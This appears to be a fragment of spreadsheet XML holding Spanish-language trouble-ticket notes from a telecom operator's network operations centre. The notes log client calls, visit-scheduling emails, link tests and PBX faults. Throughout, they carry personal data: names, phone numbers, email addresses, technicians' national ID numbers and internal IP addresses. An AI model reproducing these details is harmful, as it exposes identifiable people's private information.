!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.199.78.43 PING STATISTICS ---
    1400 PACKET(S) TRANSMITTED
    1400 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 2/2/8 MS</t>
  </si>
  <si>
    <t>###SE ESTA HACIENDO PRUEBAS CON TECNICO MICHAEL VALLADARES MEJÍA. EN CONFERENCIA PERO SE INTENTA LLAMAR AL CLIENTE KEVIN DEL CID PARA PODER CONSULTARLE UNA IP DE SU CENTRAL PARA PODER SATURAR EL ENLACE DE DATOS  CON EL PROGRAMA TFGEN PERO NO SE TIENE RESPUESTA##
SE PROCEDE A MANDARLE CORREO PARA QUE NOS PROPORCIONEN UNA IP DE UNA CENTRAL PARA PODER REALIZAR LA ULTIMA PRUEBA. SE REVISA ESTADO DE LOS EQUIPOS Y CABLEADO TODO OK A NIVEL DE CLARO.
LLAMADA CON TECNICO
1001425712
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4197
DURACIÓN: 0:23:07
ESTADO: CONECTADA
DETALLES: 4197
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 21/06/2022 12:51:28
LLAMADAS A CLIENTE
1001432486
COLA:
NOMBRE: A: 50622472143
NÚMERO: 50622472143
DURACIÓN: 0:01:37
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 50622472143
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 21/06/2022 12:51:12
1001432977
COLA:
NOMBRE: A: 50622472143
NÚMERO: 50622472143
DURACIÓN: 0:00:18
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 50622472143
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 21/06/2022 12:51:24</t>
  </si>
  <si>
    <t>###SE MANDA CORREO AL CLIENTE##
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 24 DE JUNIO DE 2022 13:10
PARA: GONZALEZ, EMANUEL &lt;EMANUEL.GONZALEZ@DXC.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CRLAAMNOC MAILBOX &lt;CRLAAMNOC_MAILBOX@DXC.COM&gt;; LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;; KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; JOSE ARTURO CORADO JIMENEZ &lt;JOSE.CORADO@CLARO.COM.GT&gt;; KEVIN OBRIAN GARCIA MALDONADO &lt;KEVIN.GARCIA@CLARO.COM.GT&gt;; BRYAN STEVE PEREZ MENDOZA &lt;BRYANS.PEREZ@CLARO.COM.GT&gt;; DEL CID ANTON, MATT KEVIN &lt;MATT.CID@KOF.COM.MX&gt;; ROBERTO TOMAS GARCIA GRAMAJO &lt;ROBERTO.GARCIA@CLARO.COM.GT&gt;; PABLO MIGUEL ERNESTO JUAREZ HERNANDEZ &lt;PABLOM.JUAREZ@CLARO.COM.GT&gt;; CAMACHO SOTO, MARCO VINICIO &lt;M.CAMACHOSOTO@DXC.COM&gt;; GUSTAVO ADOLFO BARAHONA PUTUL &lt;GUSTAVO.BARAHONA@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; PACHECO, JEAN CARLOS &lt;JEAN-CARLOS.PACHECO.PALACIOS@DXC.COM&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; YENSI SUCELY CALGUA MATEO &lt;YENSI.CALGUA@CLARO.COM.GT&gt;; MELENDEZ ALVAREZ, SOFIA &lt;S.MELENDEZALVAREZ@DXC.COM&gt;; VARGAS, MELVIN &lt;MELVIN.VARGAS@DXC.COM&gt;; JURGEN RENE BOCH CAAL &lt;JURGEN.BOCH@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;; PEREZ ARIAS, ESTEBAN ANDRES &lt;E.PEREZARIAS@DXC.COM&gt;; ARROYO ARIAS, WILBERTH GERARDO &lt;W.ARROYOARIAS@DXC.COM&gt;
ASUNTO: RE: PRUEBAS DEL SERVICIO COCA COLA FEMSA DE COSTA RICA S.A || CONTR0001286888OC || SD1132784
BUENA TARDE ESTIMADOS.
TÉCNICO ASIGNADO PARA EL DÍA LUNES A LAS 12:00 PM.
MICHAEL VALLADARES MEJIA
 CÉDULA 701500122
SALUDOS</t>
  </si>
  <si>
    <t>###SE MANDA CORREO AL CLIENTE SOLCICITANDO NOS APOYE QUITANDO EL POLICY DE SU EQUIPO PARA FINES DE PRUEBAS A RECOMENDACION DE CONSULTOR KEVIN GUERRA###
MUY BUEN DÍA ESTIMADOS.
ESTAMOS AL TANTO DE SU SOLICITUD Y SE HA ESTADO MANTENIENDO EN OBSERVACIÓN EL ENLACE, PERO NO OBSERVAMOS PERDIDAS DE NUESTRA CENTRAL A SUS EQUIPOS. QUISIÉRAMOS NOS PUDIERAN APOYAR QUITANDO TEMPORALMENTE EL POLICYS EN SU EQUIPO CON FINES DE PRUEBA PARA OBSERVAR EL ENLACE SI SIGUE PRESENTANDO LOS INCONVENIENTES.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>***SE LLAMA A CLIENTE KEVIN DEL CID   +506 2247 2143 NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001425240 - 2001425885
**</t>
  </si>
  <si>
    <t>SE TIENE EN LÍNEA A WILBER ARROYO/CLIENTE CONSULTA QUE ENVIÓ CORREO Y NO SE LE HA RESPONDIDO, SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE, VÍA TELEFÓNICA CARLOS ICHEL/GESTOR N1; EN TRIPARTITA ÉSTOS, ESTÁN GESTIONANDO EL CASO, EN ESPERA DE LO QUE DETERMINEN.</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
ODALIS ANAHI CARDENAS SALAZAR
BUEN DÍA
      QUEDAMOS ATENTOS A SUS COMENTARIOS EN SEGUIMIENTO AL CORREO QUE ANTECEDE.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTA SOLICITANDO HORA DE VISITA,
 RE: PRUEBAS DEL SERVICIO COCA COLA FEMSA DE COSTA RICA S.A || CONTR0001286888OC || SD1129158 | SD1132784
BUENA TARDE
ESTIMADO EMANUEL GONZÁLEZ, CON RESPECTO AL INCIDENTE REPORTADO Y A SOLICITUD DE VISTA TÉCNICA QUE SE TIENE PARA EL DÍA MARTES 21 DEL PRESENTE MES SOLICITAMOS DE SU APOYO EN INDICAR HORA DE VISITA PARA COORDINAR CON PERSONAL TÉCNICO.
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4602059</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO AL 24139090  NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001284011
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIETE PR 24139090  NO RESPONDE, SE INENTARA LUEGO
-ID 3001314234</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO AL 24139090  NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001301877
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE AL PR 24139090  NO RESPONDE, SE INTENTARA LUEGO**
-ID 3001418584
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIETE PR 24139090  NO RESPONDE, TONO DE DESCONECTADO || SE INENTARA LUEGO **
-ID 3001368086
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL PR 24139090   EXT 82510 NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001254329
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL PR 24139090  NO RESPONDE SE INTENTARA LUEGO **
-ID 3001243500
**</t>
  </si>
  <si>
    <t>F4602174</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERICK GUZMAN 55544302 QUIEN BRINDA EL CONTACTO DE ALGUIEN QUE SE ENCUENTRA CERCA DE LOS EQUIPOS GALVEZ - 42451461
-ID 3001318997</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERICK GUZMAN AL 55544302 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 3001284962
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER MANCILLA 55749348 QUIEN HABLA CON ERICK PARA QUE PUEDA ATENDER LA LLAMADA
-ID 3001317545</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GALVEZ - 42451461 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001321277</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERICK GUZMAN AL 55544302 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 3001302583
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERICK GUZMAN AL 55544302 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 3001257004
**</t>
  </si>
  <si>
    <t>SE LLAMA A SUPERVISOR ESTUARDO LÓPEZ 58261191 PARA CONSULTAR PERSONAL ASIGNADO, COMENTA QUE SE LLAME A CLIENTE PARA CONSULTAR SI ESPERAN HOY LUEGO DE LAS 4 PM, SE LLAMA A CLIENT EN PR JOSE GALVEZ || 42451461 QUIEN SOLICITA LLAMADA EN UNOS 10 MINUTOS PARA CONFIRMAR
3001395742
COLA:
NOMBRE: A: 42451461
NÚMERO: 42451461
DURACIÓN: 0:02:31
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 42451461
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 15/06/2022 15:01:46
3001394484
COLA:
NOMBRE: A: 58261191
NÚMERO: 58261191
DURACIÓN: 0:07:25
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 58261191
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 15/06/2022 15:03:00</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  GALVEZ - 42451461 NO RESPONDE, ENVIA A BUZON
-ID 3001361456</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE SARAC 31347517 QUIEN BRINDA OTRO CONTACTO DE PR  WALTER MANCILLA - 55749348
-ID 3001316528</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERICK GUZMAN 55544302 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001315678</t>
  </si>
  <si>
    <t>F4602178</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO DE TURNO - TECNICO DE MONITOREO  AL 78550544 - CONTESTA LA SEÑORITA SARA GUTIERREZ || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 3001286079
**</t>
  </si>
  <si>
    <t>****SE LLAMA A CLIENTE ENCARGADO DE TURNO - TECNICO DE MONITOREO  AL 78550544 - 78598805 NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001258668 - 3001258956
**</t>
  </si>
  <si>
    <t>*** SE ENVÍAN DATOS DE PERSONAL TÉCNICO A CLIENTE, A LA ESPERA DE CONFIRMACIÓN DE ACCESOS ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 15 DE JUNIO DE 2022 10:37
PARA: PHSVMETROSM@GRUPOCFA.COM.SV &lt;PHSVMETROSM@GRUPOCFA.COM.SV&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;
ASUNTO: ALIMENTOS Y TURISMO S.A. DE C.V. -- IP2204072SV
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DEL CASO, SE HA GENERADO UNA VISITA TÉCNICA, POR LO QUE SE REQUIERE DE SU APOYO EN LA GESTIÓN Y AUTORIZACIÓN DE ACCESOS PARA EL PERSONAL QUE SE DESCRIBE A CONTINUACIÓN:
00815933-2 MANUEL GARCIA
04339969-2 HECTOR IVAN URQUILLA VASQUEZ
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>**SE LLAMA AL SEÑOR RODRIGO FLORES AL 78598805 E INDICA QUE EL LLAMO BRINDADO EL CORREO MONITOREOIT@PREMIUM.SV PARA QUE SE LE ENVIE INFORMACION Y EL NOS ESTARA VALIDANDO CUANDO TENGA LOS ACCESOS**
ID 3001310963
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SARA GUTIERREZ  AL 78550544 INDICA QUE NO HA RECIBIO CORREO Y SOLICITA QUE SE LE ENVIE INFORMACION POR WHATSAPP || SE NOTIFICA A GESTOR INDICA  QUE NO SE LE PUEDE ENVIAR POR MEDIO DE WHATSAPP||**
-ID 3001308656 - 300130
**</t>
  </si>
  <si>
    <t>**SE LLAMA AL SEÑOR RODRIGO FLORES AL 78598805  INDICA QUE AUN NO CUENTAN CON PERMISOS QUE TRATARA DE COMUNICARSE PARA SOLICITARLOS Y QUE NOS RESPONDERA POR CORREO O QUE LE LLAMEMOS A LAS 14:00 HRS**
ID 3001343232
**</t>
  </si>
  <si>
    <t>F4602182</t>
  </si>
  <si>
    <t>CLIENTE VICTOR TURTON 52088055 REALIZA PRUEBAS Y VALIDA QUE EL E1 YA SE ENCUENTRA OPERATIVO. AUTORIZA EL CIERRE DEL CASO.
ID: 3001338666</t>
  </si>
  <si>
    <t>INFORMA CLIENTE VICTOR TURTON 52088055 QUE EL DÍA DE AYER SE CAYÓ UN ARBOL EN LA ZONA DAÑANDO EL TENDIDO DE FIBRA, INDICA QUE TIENE FUERA SU SERVICIO DE INTERNET Y EL PBX, SE COORDINARÁ VISITA. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4602186</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROBERTO CARLOS ARGUETA SÁNCHEZ AL 22399702 CONFIRMA SERVICIO ESTABLE Y OPERATIVO || AUTORIZA CIERRE DE TICKET  **
-ID 3001287818
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROBERTO CARLOS ARGUETA SÁNCHEZ AL 22399702 NO RESPONDE || ENVIA  A BUZON ||
SE INTENTARA LUEGO **
-ID 3001260154
**</t>
  </si>
  <si>
    <t>F4602206</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA LA GESTION DE LOS PERMISOS
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 15 DE JUNIO DE 2022 9:23
PARA: CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; SAUL ORELLANA (VENDOR) &lt;SAUL.ORELLANA0@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE DF TEXISTEPEQUE ID: IP2368006
BUEN DÍA
SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
05356271-8 KEVIN MEJIA
04271773-2 MIGUEL DUEÑAS
01320096-0 OSCAR RENE VIDES RAMIREZ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602207</t>
  </si>
  <si>
    <t>SE HABLÓ CON FREDY GARCÍA/CLIENTE 55550306 INDICA QUE HOY POR LA MAÑANA TUVO ALGUNAS PÉRDIDAS, PIDE SE VERIFIQUE; EN BASE A LO DEL MONITOREO, ÉL AUTORIZARÁ CIERRE DEL TICKET. SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE DE LO DICHO POR CLIENTE.</t>
  </si>
  <si>
    <t>F4602218</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANGELA BALICO AL 87437048 NO RESPONDE | ENVIA A BUZON | SE INTENTATA LUEGO **
-ID 3001261136 - 3001262084
**</t>
  </si>
  <si>
    <t>F4602219</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174-5299 RESPONDEN PERO DEJAN LLAMADA EN ESPERA Y NO LA RETOMAN  ||
SE INTENTARA LUEGO **
-ID 3001264811
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174-5299 CONTESTA EL SEÑOR  EMILIO AGUILAR INDICA QUE AUN NO TIENEN EL NUMERO QUE YA LO SOLICITARON A CLIENTE FINAL Y QUE ELLOS LO ESTARAN ENVIANDO CUANDO LO TENGAN**
-ID 3001303643
**</t>
  </si>
  <si>
    <t>F4602235</t>
  </si>
  <si>
    <t>EN LINEA CON WALTER REYES AL 45787911 ID 3001385644 SE LE CONSULTA COMO VE EL SERVICIO, COMENTA QUE NO ES NECESARIO MAYOR INTERVENCIÓN, POR TAL RAZÓN AUTORIZA EL CIERRE, SE PROCEDE CON SOLICITAR EL CIERRE  DE LA FALLA Y TICKET  AL GESTOR ALEJANDRO.NAVARRO VÍA SKYPE PARA EL APOYO</t>
  </si>
  <si>
    <t>F4602253</t>
  </si>
  <si>
    <t>TECNICO ASIGNADO
LENIN ANTONIO ARAUZ  CISNERO
NI400943</t>
  </si>
  <si>
    <t>3001283993
COLA:
NOMBRE: A: 50586485553
NÚMERO: 50586485553
DURACIÓN: 0:00:29
ESTADO: MARCANDO
DETALLES: 50586485553
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JANTONIO.FERNANDEZ
FECHA Y HORA LOCALES: 15/06/2022 09:52:57</t>
  </si>
  <si>
    <t>PLANTA INTERNA - CNOC NICARAGUA				
	WO OPEN                                			9:08
1/4	NACXHITL BERNARDINO PEREIRA 	87134513	3 HORAS	12:08:00
2/4	MARLON JAIME	88500414	4 HORAS	13:08:00
3/4	NORMAN SELVA                	88561050	5 HORAS	14:08:00
4/4	MARIO HURTADO	88538938	6 HORAS	15:08:00</t>
  </si>
  <si>
    <t>SE PIDE EN TEAMS  ASIGNACION TECNICA</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. YESNER TELLEZ 57165897 INFORMA QUE EL ROUTER CISCO PRESENTA DAÑO, AL ENCENDER LOS VENTILADORES ESTAN FORZADOS SE ESCUCHAN CON RUIDO EXCESIVO, ACTUALMENTE LO TIENEN APAGADO, SOLICITAN VISITA TECNICA PARA LA REVISION DE LOS EQUIPOS DE ULTIMA MILLA...</t>
  </si>
  <si>
    <t>SE DETIENEN ESCALACIONES SERVICIO ACTIVO, PERSONAL DE CAMPO DA MANTENIMIENTO A VENTILADORES DE ROUTER CISCO, QUEDANDO OPERATIVOS Y SERVICIO ESTABLE,, CLIENTE REALIZA ACOMODAMIENTO DE EQUIPO, SE ESPERA A QUE NORMALICEN LA RED LOCA</t>
  </si>
  <si>
    <t>ESTIMADOS FAVOR SU APOYO CON VISITA AL SITIO REMOTO, DOCUMENTAR Y EVIDENCIAR EL ESTADO DE LOS EQUIPOS, VALIDAR SI CLIENTE TIENEN PROTECCION UPS Y CONEXION A TIERRA YA QUE PUEDE QUE SE DAÑEN LOS EQUIPOS Y SEA ATRIBUIBLE A CLIENTE POR NO TENER LOS REQUISITOS MINIMOS PARA LA INSTALACION DE LOS EQUIPOS DE RED, SE ADJUNTA FORMATO GRACIAS.</t>
  </si>
  <si>
    <t>EN SITIO SE ENCUENTRA  ACELERACION EN EL FAN DE CISCO SE ESTA DANDO MANTENIEMIENTO , EL FAN DEBE DE SER REPARADO.
 SE LLAMARA VUEVAMENTE EN 30 MINUTOS</t>
  </si>
  <si>
    <t>3001284417
COLA:
NOMBRE: A: 50586485553
NÚMERO: 50586485553
DURACIÓN: 0:00:36
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 50586485553
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JANTONIO.FERNANDEZ
FECHA Y HORA LOCALES: 15/06/2022 09:55:41</t>
  </si>
  <si>
    <t>F4602257</t>
  </si>
  <si>
    <t>CLIENTE REINICIANDO PBX
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>AUN PERSISTE LAS ALARMAS EN EL ASMI, CLIENTE ESTA REVISANDO EL CABLEADO Y REINICIARA LA OBX
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE UBICA EQUIPO ASMI 52 EL CUAL INDICA QUE ESTA ALARMADO DE LA SIGUIENTE MANERA
PWR VERDE
SYNC VERDE
E1 SYNC - ROJO
ALM - ROJO
CLIENTE NOS APOYA CON EL REINICIO DE EQUIPOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA OCN CLIENTE PARA INFORMARLE QUE TIENE QUE VALIDE LA PBX  DONALDO GOMEZ 35783482 SIN EMBARGO NO SE TIENE RESPUESTA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE DONALDO GOMEZ 35783482
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE ENVIA INFORMACION A CLIENTE Y A EJECUTIVA
RE: FALLA E1 24198181
MONICA YIREH CASTILLO POON
BUENAS TARDES LAURA,
LE COMENTO QUE PERSONAL TÉCNICO SE PRESENTO A LAS INSTALACIONES DEL CLIENTE, EN DONDE REALIZARON PRUEBAS CON EMULADOR TANTO LLAMADAS SALIENTES Y ENTRANTES COMPLETAN SIN PROBLEMAS. AL MOMENTO DE CONECTAR LA PBX YA NO SE PUEDEN REALIZAR LLAMADAS, TÉCNICO INDICO QUE TIENEN QUE DAR SEGUIMIENTO CON EL PROVEEDOR DE LA PLANTA PARA REVISAR LA CONFIGURACIÓN.
A NIVEL DE CLARO NO SE PRESENTO INCONVENIENTES, CLIENTE DEBERÁ DE ESCALAR CON EL PROVEEDOR O EL ADMINISTRADOR DE LA PBX PARA VERIFICAR LA CONFIGURACIÓN DE LA MISMA.
SALUDOS,</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE LA PBX SE TARDA ALREDEDOR DE 5 MIN EN CARGAR, NOS MANTIENE EN LINEA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4602272</t>
  </si>
  <si>
    <t>**SE LLAMA  DUGLAS XIA  AL 24178700 EXT 3158 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 3001291064
**</t>
  </si>
  <si>
    <t>**SE LLAMA  DUGLAS XIA  AL 24178700 EXT 3158 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 3001267943
**</t>
  </si>
  <si>
    <t>F4602294</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BYRAN POCASANGRE AL 25041690  NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001433669
**</t>
  </si>
  <si>
    <t>F4602296</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MIGUEL ERAZO 70425729 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001256813</t>
  </si>
  <si>
    <t>F4602297</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL, MENCIONA QUE ESTOS PERMISOS LOS VE ERWIN CHOQUIN -EXT 2416
-ID 3001723492</t>
  </si>
  <si>
    <t>FAVOR  LEER CRONOLOGIA O COLA DE CORREOS   TODO ESTA  ANOTADO  , SE PUEDE BRINDAR MEJOR SERVICIO AL CLIENTE SI EN LUGAR DE SOLO RESPONDER SE SOLICITA  A AREA ENCARGADA SE INDAGA , SE LLE TODO ESTA DOCUMENTADO, "PROACTIVIDAD"
SE ENVIA CORREO A CLIENTE
RE: VERIFICACION FALLAS DE ENLACES CLARO ATM 3147 / CAIDA TOTAL Y REVISION DE EQUIPOS
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:LUIS GALINDO &lt;LGALINDO@5B.COM.GT&gt;;CLIENTESCORPORATIVOS;KEVIN OBRIAN GARCIA MALDONADOY 13 MÁS
CC:MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;;TELECOMUNICACIONES &lt;TTI@5B.COM.GT&gt;;JOSE RODOLFO ESTRADA MUÑOZY 4 MÁS
MIÉ 22/06/2022 10:06
BUEN DIA  ESTIMADO CLIENTE LE ADJUNTO DATOS DE NUESTROS TECNICOS ,
IVAN ARRAZOLA                                             951013 2319 45019 0101   P-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FAVOR INDICAR FECHA Y HORA DE VISITA
SALUDOS</t>
  </si>
  <si>
    <t>REENVIO CORREO  EN ESPERA DE RESPUESTA
VERIFICACION FALLAS DE ENLACES CLARO ATM 3147 / CAIDA TOTAL Y REVISION DE EQUIPOS
BUENOS DÍAS SR OSCAR PORTILLO
EN SEGUIMIENTO AL SERVICIO Y SEGÚN LO CONVERSADO VÍA TELEFÓNICA, SE PROCEDIÓ A VALIDAR EL MISMO POR PARTE DE CNOC Y ME INFORMAN QUE ELLOS CONTINÚAN OBSERVÁNDOLO CAÍDO, AGRADECERÍAMOS SU APOYO CONFIRMANDO COMO LO OBSERVAN USTEDES E INDICARNOS FECHA Y HORA QUE SE PUEDE PROCEDER CON LA VISITA.
QUEDAMOS ATENTOS A SUS COMENTARIOS.</t>
  </si>
  <si>
    <t>RE: VERIFICACION FALLAS DE ENLACES CLARO ATM 3147 / CAIDA TOTAL Y REVISION DE EQUIPOS
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:OPERADORES ATM 3 &lt;OPERADORES.ATM3@TAV.COM.GT&gt;;DIONICIO VELIZ CERON;LGALINDO@5B.COM.GT;CLIENTESCORPORATIVOSY 21 MÁS
JUE 23/06/2022 8:50
BUEN DIA ESTIMADOS,
LES COMENTO QUE SE REALIZO REVISIÓN POR NUESTRA ÁREA TÉCNICA, DETERMINANDO QUE SE TIENE CORTE A 89 MTS DE CAJERO  DENTRO DE CENTRO COMERCIAL, POR TAL MOTIVO SOLICITAMOS DE SU AMABLE APOYO PARA COORDINAR TRABAJOS DE NUESTRA ÁREA TÉCNICA  CON ADMINISTRACIÓN DE CENTRO COMERCIAL (RED OPTIMA) , EH INDICARNOS DÍA Y HORA QUE AUTORICEN VISITA.
QUEDO ATENTO A SU RESPUESTA</t>
  </si>
  <si>
    <t>SE REVISA COLA DE CORREO AUN NO SE TIENE RESPUESTA DEL CLIENTE
ASUNTO: VERIFICACION FALLAS DE ENLACES CLARO ATM 3147 / CAIDA TOTAL Y REVISION DE EQUIPOS</t>
  </si>
  <si>
    <t>VERIFICACION FALLAS DE ENLACES CLARO ATM 3147 / CAIDA TOTAL Y REVISION DE EQUIPOS
JONATHAN EDUARDO TEZEN MEJIA
BUEN DIA ESTIMADOS
GUSTO EN SALUDARLES ,  LE COMENTO QUE NUESTRO PERSONAL  TECNICO YA SE ENCUNTRA EN SITIO DESDE LAS 08:00 SIN EMBARGO AUN NO SE HA PRESENTADO PERSONAL DE SEGURIDAD PARA APRTURAR CAJERO ,  AGRADECEMOS INDICAR EN CUANTO TIEMPO LLEGAN O SI SE REPROGRAMA  VISITA
QUEDO ATENTO A SUS COMENTARIOS</t>
  </si>
  <si>
    <t>* CARLOS DE LEON (CLIENTE) INFORMA QUE ELLOS YA REALIZARON LOS CAMBIOS Y LO VEN TODO OK, LA IP QUE TIENEN DEL CAJERO ES 10.233.140.158, AUTORIZAN CIERRE DE TICKET -*
-*</t>
  </si>
  <si>
    <t>SE REENVÍA DE NUEVO CORREO A CLIENTE SOLICITÁNDOLE APOYO PARA SEGUIMIENTO TICKET</t>
  </si>
  <si>
    <t>COMPAÑEROS BUENOS DIAS ,  NO ES DE ESTAR LLAMANDO AL CLIENTE  ES DE ESTAR A LA ESPERA , YA DEPENDE DE ACCESOS DE RED OPTIMA NO DE NUESTRO CLIENTE , SODO ESTA DOCUMENTADO  FAVOR LEER CRONOLOGIA
SE REVISA COLA DE CORREO SIN RESPUESTA DE CLIENTE|  ACCESO RED OPTIMA
